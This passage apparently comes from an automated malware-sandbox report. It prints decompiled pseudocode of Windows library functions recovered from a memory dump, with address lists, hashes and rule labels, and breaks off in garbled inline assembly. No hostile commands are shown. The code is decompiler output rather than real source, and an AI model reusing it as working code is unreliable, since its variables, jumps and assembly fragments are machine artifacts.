							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0125F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0126DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0125B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0125B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0125E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0125A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                    0x0121b171
                                                    0x0121b171
                                                    0x0121b171
                                                    0x0121b171
                                                    0x0121b171
                                                    0x0121b176
                                                    0x0121b17b
                                                    0x0121b180
                                                    0x0121b186
                                                    0x0121b18f
                                                    0x0121b198
                                                    0x0121b1a4
                                                    0x0121b1aa
                                                    0x01274802
                                                    0x01274802
                                                    0x01274805
                                                    0x0127480c
                                                    0x0127480e
                                                    0x0121b1d1
                                                    0x0121b1d3
                                                    0x0121b1de
                                                    0x0121b1de
                                                    0x01274817
                                                    0x0127481e
                                                    0x01274820
                                                    0x01274822
                                                    0x01274822
                                                    0x01274824
                                                    0x01274824
                                                    0x0127482a
                                                    0x00000000
                                                    0x00000000
                                                    0x01274835
                                                    0x0127483a
                                                    0x0127483d
                                                    0x0127483f
                                                    0x01274842
                                                    0x01274842
                                                    0x01274842
                                                    0x01274846
                                                    0x0127484c
                                                    0x0127484e
                                                    0x01274851
                                                    0x01274851
                                                    0x01274853
                                                    0x01274854
                                                    0x01274854
                                                    0x01274858
                                                    0x0127485a
                                                    0x0127485a
                                                    0x0127485d
                                                    0x0127485f
                                                    0x01274861
                                                    0x01274861
                                                    0x01274866
                                                    0x0127486b
                                                    0x0127486e
                                                    0x01274871
                                                    0x01274876
                                                    0x01274876
                                                    0x01274878
                                                    0x0127487b
                                                    0x01274884
                                                    0x01274884
                                                    0x00000000
                                                    0x0127487d
                                                    0x0127487d
                                                    0x01274882
                                                    0x01274889
                                                    0x01274889
                                                    0x0127488f
                                                    0x01274891
                                                    0x012748e0
                                                    0x012748e2
                                                    0x012748e4
                                                    0x012748e4
                                                    0x012748e7
                                                    0x012748e7
                                                    0x012748ed
                                                    0x012748f4
                                                    0x012748f6
                                                    0x01274951
                                                    0x01274951
                                                    0x01274953
                                                    0x01274953
                                                    0x01274956
                                                    0x01274956
                                                    0x01274958
                                                    0x01274959
                                                    0x01274959
                                                    0x0127495d
                                                    0x0127495d
                                                    0x0127495f
                                                    0x0127495f
                                                    0x01274965
                                                    0x01274969
                                                    0x012749ba
                                                    0x012749ba
                                                    0x012749c1
                                                    0x012749c5
                                                    0x012749cc
                                                    0x012749d4
                                                    0x012749d7
                                                    0x012749da
                                                    0x012749e4
                                                    0x012749e5
                                                    0x012749f3
                                                    0x01274a02
                                                    0x00000000
                                                    0x01274a02
                                                    0x01274972
                                                    0x01274974
                                                    0x00000000
                                                    0x00000000
                                                    0x01274976
                                                    0x01274979
                                                    0x01274982
                                                    0x01274983
                                                    0x01274984
                                                    0x0127498b
                                                    0x0127498d
                                                    0x01274991
                                                    0x01274993
                                                    0x01274999
                                                    0x0127499d
                                                    0x012749a2
                                                    0x012749a2
                                                    0x012749a2
                                                    0x01274999
                                                    0x012749ac
                                                    0x00000000
                                                    0x012749b3
                                                    0x012748f8
                                                    0x012748fe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012748fe
                                                    0x01274895
                                                    0x0127489c
                                                    0x012748ad
                                                    0x012748b2
                                                    0x012748b5
                                                    0x012748b7
                                                    0x012748ba
                                                    0x012748bc
                                                    0x012748c6
                                                    0x012748c6
                                                    0x012748cb
                                                    0x012748d1
                                                    0x012748d4
                                                    0x012748d8
                                                    0x012748d8
                                                    0x00000000
                                                    0x012748d8
                                                    0x012748be
                                                    0x012748c0
                                                    0x00000000
                                                    0x00000000
                                                    0x012748c2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012748c4
                                                    0x00000000
                                                    0x01274882
                                                    0x0127487b
                                                    0x01274904
                                                    0x01274906
                                                    0x00000000
                                                    0x00000000
                                                    0x01274908
                                                    0x0127490e
                                                    0x00000000
                                                    0x00000000
                                                    0x01274910
                                                    0x01274917
                                                    0x01274917
                                                    0x00000000
                                                    0x01274917
                                                    0x0121b1ba
                                                    0x012747f9
                                                    0x012747fc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x012747fc
                                                    0x0121b1c0
                                                    0x0121b1c0
                                                    0x0121b1c3
                                                    0x0121b1cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: _vswprintf_s
                                                    • String ID:
                                                    • API String ID: 677850445-0
                                                    • Opcode ID: f3b09139cdf0f348a2355254b793f83db8fccbd6b422c42d3bd9759cc3a8cbc1
                                                    • Instruction ID: 4a8ea5851fb5a8a40921c850d1f3bc310787a68a5586b27591347eaa6427da66
                                                    • Opcode Fuzzy Hash: f3b09139cdf0f348a2355254b793f83db8fccbd6b422c42d3bd9759cc3a8cbc1
                                                    • Instruction Fuzzy Hash: 0351F371D202AACFDF31DF68C845BBEBBB0BF04310F1041A9D959AB282D7704941CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0123B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 76%
                                                    			E0123B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x130d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01237D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E012E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01259E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0125B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0125CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01237D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E012E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0125AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1308628; // 0x0
								_v68 = _t77;
								_t78 =  *0x130862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1308628; // 0x0
							_t116 =  *0x130862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                    0x0123b94c
                                                    0x0123b956
                                                    0x0123b95c
                                                    0x0123b95e
                                                    0x0123b964
                                                    0x0123b969
                                                    0x0123b96d
                                                    0x0123b96d
                                                    0x0123b970
                                                    0x0123b974
                                                    0x0123b97a
                                                    0x0123badf
                                                    0x0123badf
                                                    0x0123bae2
                                                    0x0123bae4
                                                    0x0123bae6
                                                    0x0123baf0
                                                    0x01282cb8
                                                    0x0123baf6
                                                    0x0123baf6
                                                    0x0123baf6
                                                    0x0123bafd
                                                    0x0123bb1f
                                                    0x0123bb1f
                                                    0x0123baff
                                                    0x0123bb00
                                                    0x0123bb00
                                                    0x0123bb03
                                                    0x0123bb03
                                                    0x0123bacb
                                                    0x0123bacf
                                                    0x0123bad0
                                                    0x0123bad1
                                                    0x0123badc
                                                    0x0123badc
                                                    0x0123b980
                                                    0x0123b980
                                                    0x0123b988
                                                    0x0123b98b
                                                    0x0123b98d
                                                    0x0123b990
                                                    0x0123b993
                                                    0x0123b999
                                                    0x0123b99b
                                                    0x0123b9a1
                                                    0x0123b9a5
                                                    0x0123b9aa
                                                    0x0123b9b0
                                                    0x0123b9bb
                                                    0x0123b9c0
                                                    0x0123b9c3
                                                    0x0123b9ca
                                                    0x0123b9cc
                                                    0x0123b9cf
                                                    0x0123b9d3
                                                    0x0123b9d7
                                                    0x0123ba94
                                                    0x0123ba94
                                                    0x0123ba98
                                                    0x0123baa3
                                                    0x01282ccb
                                                    0x0123baa9
                                                    0x0123baa9
                                                    0x0123baa9
                                                    0x0123bab1
                                                    0x01282cd5
                                                    0x01282cdd
                                                    0x01282cdd
                                                    0x0123babb
                                                    0x0123babc
                                                    0x0123bac2
                                                    0x0123bac3
                                                    0x0123bac3
                                                    0x0123bac6
                                                    0x00000000
                                                    0x0123b9dd
                                                    0x0123b9dd
                                                    0x0123b9e7
                                                    0x0123b9e7
                                                    0x0123b9ec
                                                    0x0123b9ec
                                                    0x0123b9f1
                                                    0x0123b9f5
                                                    0x0123b9fa
                                                    0x0123ba00
                                                    0x0123ba0c
                                                    0x0123ba10
                                                    0x0123ba10
                                                    0x0123ba12
                                                    0x0123ba18
                                                    0x00000000
                                                    0x00000000
                                                    0x0123bb26
                                                    0x0123bb26
                                                    0x0123ba1e
                                                    0x0123ba1e
                                                    0x0123ba23
                                                    0x0123ba25
                                                    0x0123ba2c
                                                    0x0123ba30
                                                    0x0123ba35
                                                    0x0123ba35
                                                    0x0123ba41
                                                    0x0123ba46
                                                    0x0123ba4c
                                                    0x0123ba50
                                                    0x0123ba54
                                                    0x0123ba6a
                                                    0x0123ba6e
                                                    0x0123ba70
                                                    0x0123ba74
                                                    0x0123ba78
                                                    0x0123ba7a
                                                    0x0123ba7c
                                                    0x0123ba8e
                                                    0x0123ba90
                                                    0x0123ba92
                                                    0x0123bb14
                                                    0x0123bb14
                                                    0x0123bb16
                                                    0x0123bb16
                                                    0x00000000
                                                    0x0123ba7c
                                                    0x0123bb0a
                                                    0x0123bb0d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0123bb0f

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0123B9A5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.850207954.00000000011F0000.00000040.00000001.sdmp, Offset: 011F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID:
                                                    • API String ID: 885266447-0
                                                    • Opcode ID: bb70b7436de0be062cbec0f3fda04a209f42863f502f5084a764d4712faafe10
                                                    • Instruction ID: dbc2724865353d699eb80e857455b21238af861bb13c924c297f9a4658e6380b
                                                    • Opcode Fuzzy Hash: bb70b7436de0be062cbec0f3fda04a209f42863f502f5084a764d4712faafe10
                                                    • Instruction Fuzzy Hash: 8E516AB1A28706CFC725DF28C4C092ABBF5FBC8610F15496EEA8587355D770E845CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01242581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E01242581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912032) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed char _t244;
				signed char _t247;
				void* _t248;
				signed int _t249;
				signed char _t250;
				signed char _t251;
				signed char _t252;
				signed int _t255;
				signed int _t257;
				intOrPtr _t259;
				signed int _t262;
				signed int _t269;
				signed int _t272;
				signed int _t280;
				intOrPtr _t286;
				signed int _t288;
				signed int _t290;
				void* _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t339;
				signed int _t341;
				signed int _t344;
				signed int _t345;
				void* _t347;
				void* _t348;

				_t341 = _t344;
				_t345 = _t344 - 0x4c;
				_v8 =  *0x130d360 ^ _t341;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x130b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t348 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t286 = 0x48;
				_t315 = 0 | _t348 == 0x00000000;
				_t326 = 0;
				_v37 = _t348 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t286 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L01234620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t286);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t286;
							_t288 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x1308478;
								 *_t333 = ((0 | _t315 == 0x01308478) - 0x00000001 & 0xfffffffb) + 7;
								E0125F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t345 = _t345 + 0xc;
								_t288 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t280 = E012A39F2(_t328);
									_t315 = _v32;
									_t328 = _t280;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t290 = _t333 + _t288 * 4;
								_v56 = _t290;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t290 =  *(_v60 + _t299 * 4);
										 *(_t290 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01242959))) {
												case 0:
													__ax =  *0x1308488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0125F3E0(__edi,  *0x130848c, __ax & 0x0000ffff);
														__eax =  *0x1308488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0125F3E0(_t328, _v80, _v64);
													_t275 = _v64;
													goto L26;
												case 2:
													 *0x1308480 & 0x0000ffff = E0125F3E0(__edi,  *0x1308484,  *0x1308480 & 0x0000ffff);
													__eax =  *0x1308480 & 0x0000ffff;
													__eax = ( *0x1308480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0125F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0125F3E0(_t328, _v76, _v36);
														_t275 = _v36;
													}
													L26:
													_t345 = _t345 + 0xc;
													_t328 = _t328 + (_t275 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t277);
													 *((short*)(_t328 - 2)) = _t277;
													goto L28;
												case 6:
													__ebx =  *0x130575c;
													__eflags = __ebx - 0x130575c;
													if(__ebx != 0x130575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0125F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x130575c;
														} while (__ebx != 0x130575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1308478 & 0x0000ffff = E0125F3E0(__edi,  *0x130847c,  *0x1308478 & 0x0000ffff);
													__eax =  *0x1308478 & 0x0000ffff;
													__eax = ( *0x1308478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E012A39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1306e58 & 0x0000ffff = E0125F3E0(__edi,  *0x1306e5c,  *0x1306e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1306e58 & 0x0000ffff;
													__eax = ( *0x1306e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t290 = _t290 + 4;
													__eflags = _t290;
													_v56 = _t290;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01242935))) {
							case 0:
								__ax =  *0x1308488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E01242E3E(0,  &_v64);
								_t286 = _t286 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1308480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1308480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0122EEF0(0x13079a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0122EB70(__ecx, 0x13079a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L012377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1307b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01234620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0122EB70(__ecx, 0x13079a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t341;
										_pop(_t287);
										return E0125B640(_t219, _t287, _v8 ^ _t341, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t282 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t284 = E01242E3E(_t282,  &_v36);
									_t295 = _v36;
									_v76 = _t284;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t286 = _t286 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x1305764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1308478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1308478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1306e58 & 0x0000ffff;
								__eax = ( *0x1306e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [ecx+eax], ah");
